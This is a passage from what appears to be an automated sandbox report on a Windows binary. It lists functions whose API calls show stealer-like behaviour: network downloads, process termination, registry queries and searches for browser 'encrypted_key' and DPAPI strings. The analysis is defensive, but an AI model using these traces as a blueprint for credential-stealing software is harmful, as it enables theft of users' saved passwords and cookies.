                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: e4c8913b807668bcb01b9d919b777a533531cc618f5a94a954fce6c5f9e85a02
                          • Instruction ID: 1200c482a0e18c7fe950aa910f2d200d290803bdf77c85180dfaca21cd49903b
                          • Opcode Fuzzy Hash: e4c8913b807668bcb01b9d919b777a533531cc618f5a94a954fce6c5f9e85a02
                          • Instruction Fuzzy Hash: 0E51A272A10219DBDB11EF68DC89B9E77F4AF50314F154224FE49EB282DB78ED058B90
                          Function 00705640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0070565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00705661
                          • InternetOpenA.WININET(0072CFEC,00000000,00000000,00000000,00000000), ref: 00705677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00705692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 007056BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 007056E1
                          • InternetCloseHandle.WININET(?), ref: 007056FA
                          • InternetCloseHandle.WININET(00000000), ref: 00705701
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 0024836e18cf3c5d400129b029c6498dae95e0774caf69bfe7848b7ba97a7c7d
                          • Instruction ID: 73482982754f05767cddd9ed543dc1e469abeb315b019a7a3311d75e90938990
                          • Opcode Fuzzy Hash: 0024836e18cf3c5d400129b029c6498dae95e0774caf69bfe7848b7ba97a7c7d
                          • Instruction Fuzzy Hash: FF41AC70A04605EFDB24CF94DC88BAAB7F4FF48700F1481A9E9089B2D0E7B5A941DF90
                          Function 00724740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00724759
                          • Process32First.KERNEL32(00000000,00000128), ref: 00724769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0072477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0072479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 007247AB
                          • CloseHandle.KERNEL32(00000000), ref: 007247B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007247C0
                          • CloseHandle.KERNEL32(00000000), ref: 007247CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 4b53d29ecef5b73d5e7cc6b51691c6693055412e2a03cabdbcf7d9f1c6dcc93c
                          • Instruction ID: 2e58e5c1b640f146ae66a7795c9c7cc333740929c2b1f36843023dd78b0290dc
                          • Opcode Fuzzy Hash: 4b53d29ecef5b73d5e7cc6b51691c6693055412e2a03cabdbcf7d9f1c6dcc93c
                          • Instruction Fuzzy Hash: 0D01B171615324ABE7215B70ACC9FEB77BCEB08752F000180F909E1290EFB88D809EA0
                          Function 007183E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00718435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071846C
                          • lstrlen.KERNEL32(00000000), ref: 007184B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007184E9
                          • lstrlen.KERNEL32(00000000), ref: 007184FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071852E
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 0071853E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: baa8ad8de328dd446d4f8f641a9dbf94622c84fc4bea407492f60a124c8d1280
                          • Instruction ID: d2f529183c11beb969498632ae5499409256661a4af626c1eea081a71ba2ba4e
                          • Opcode Fuzzy Hash: baa8ad8de328dd446d4f8f641a9dbf94622c84fc4bea407492f60a124c8d1280
                          • Instruction Fuzzy Hash: 46516F755002029FCB64DF6CD888A9BB7F5EF44700F248559EC45EB285EF38E981CB51
                          Function 00722910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00722925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0072292C
                          • RegOpenKeyExA.ADVAPI32(80000002,010CB9D8,00000000,00020119,007228A9), ref: 0072294B
                          • RegQueryValueExA.ADVAPI32(007228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00722965
                          • RegCloseKey.ADVAPI32(007228A9), ref: 0072296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: d1299768b992b1dc0314454611ad9c4fa2dad7a773d5a101d16c2a8bb348231c
                          • Instruction ID: aafa73e0900a873dd9f8f72b7fd9322d4d506fc4fd9d8428850803cbaf66102e
                          • Opcode Fuzzy Hash: d1299768b992b1dc0314454611ad9c4fa2dad7a773d5a101d16c2a8bb348231c
                          • Instruction Fuzzy Hash: F001D475604319BBD314CBA0EC59FFB7BBCEB48711F100058FE85E7241EA7199458B90
                          Function 00722880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00722895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0072289C
                            • Part of subcall function 00722910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00722925
                            • Part of subcall function 00722910: RtlAllocateHeap.NTDLL(00000000), ref: 0072292C
                            • Part of subcall function 00722910: RegOpenKeyExA.ADVAPI32(80000002,010CB9D8,00000000,00020119,007228A9), ref: 0072294B
                            • Part of subcall function 00722910: RegQueryValueExA.ADVAPI32(007228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00722965
                            • Part of subcall function 00722910: RegCloseKey.ADVAPI32(007228A9), ref: 0072296F
                          • RegOpenKeyExA.ADVAPI32(80000002,010CB9D8,00000000,00020119,00719500), ref: 007228D1
                          • RegQueryValueExA.ADVAPI32(00719500,010DE080,00000000,00000000,00000000,000000FF), ref: 007228EC
                          • RegCloseKey.ADVAPI32(00719500), ref: 007228F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 49104072a3378f65c4684595a12f5570830161f565d7aa5656d92d428c6d7e61
                          • Instruction ID: f9bb6468b120d4769706384ec342d830f2faa4e68c211db3847cb952b52a9236
                          • Opcode Fuzzy Hash: 49104072a3378f65c4684595a12f5570830161f565d7aa5656d92d428c6d7e61
                          • Instruction Fuzzy Hash: AD01A275614318BFD7149BA4AC4DFAB777DEB44311F000154FE08D6251DAB499459BE0
                          Function 007071F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 0070723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00707279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00707280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007072C3
                          • HeapFree.KERNEL32(00000000), ref: 007072CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00707329
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: 5446667985cf3d80a9cd79f06d2ae615e83b28ef09d6a3986f8160f06e3000fe
                          • Instruction ID: c57f29bf7525e792cc771b6eb73b155dfe6f0e08d683fb47190a271b4896c1d7
                          • Opcode Fuzzy Hash: 5446667985cf3d80a9cd79f06d2ae615e83b28ef09d6a3986f8160f06e3000fe
                          • Instruction Fuzzy Hash: 7A414A71B09606DBEB24CF69DC84BAAF3E8FB89305F144669EC49C7380E675E900DA50
                          Function 0071D7B0 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0071D7D6
                          • RegOpenKeyExA.ADVAPI32(80000001,010DD148,00000000,00020119,?), ref: 0071D7F5
                          • RegQueryValueExA.ADVAPI32(?,010DDB70,00000000,00000000,00000000,000000FF), ref: 0071D819
                          • RegCloseKey.ADVAPI32(?), ref: 0071D823
                          • lstrcat.KERNEL32(?,00000000), ref: 0071D848
                          • lstrcat.KERNEL32(?,010DDBB8), ref: 0071D85C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: 9f17352a2176ba307976e2d244c247815a603984b951bbe8364b5d6dfd846874
                          • Instruction ID: 429f81631e6e73b3c220b4b3e0a4e2e28fe82c0938ccb6d6b919dfbbc1abf5f4
                          • Opcode Fuzzy Hash: 9f17352a2176ba307976e2d244c247815a603984b951bbe8364b5d6dfd846874
                          • Instruction Fuzzy Hash: E141867161020CEFCB54EF68EC8ABDE77B5AB44304F408164B90997291EE74AE99CFD1
                          Function 00709C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 00709CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00709CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00709D03
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: d89477ce3fff88a47074096082491b8e20461c32d3d812b16d852042527903c1
                          • Instruction ID: abc413f9f4f7f9eaa66e0432ddc3538e404a16a6b5e34aac89a2fc19fc033087
                          • Opcode Fuzzy Hash: d89477ce3fff88a47074096082491b8e20461c32d3d812b16d852042527903c1
                          • Instruction Fuzzy Hash: 49415172B1020ADBDB21EF68D8496AFB7F4AF54314F044664EE15A7293EA38AD05C790
                          Function 0071E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071EA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071EA53
                          • lstrcat.KERNEL32(?,00000000), ref: 0071EA61
                          • lstrcat.KERNEL32(?,00731794), ref: 0071EA7A
                          • lstrcat.KERNEL32(?,010D8950), ref: 0071EA8D
                          • lstrcat.KERNEL32(?,00731794), ref: 0071EA9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 60548770dae395a9d95f6529ca59bc846e0c18efadd1129c0c0b3019be4e2920
                          • Instruction ID: 419d65549170aab38fd73688cb1765ae125cf619098b766a12f4731751879d23
                          • Opcode Fuzzy Hash: 60548770dae395a9d95f6529ca59bc846e0c18efadd1129c0c0b3019be4e2920
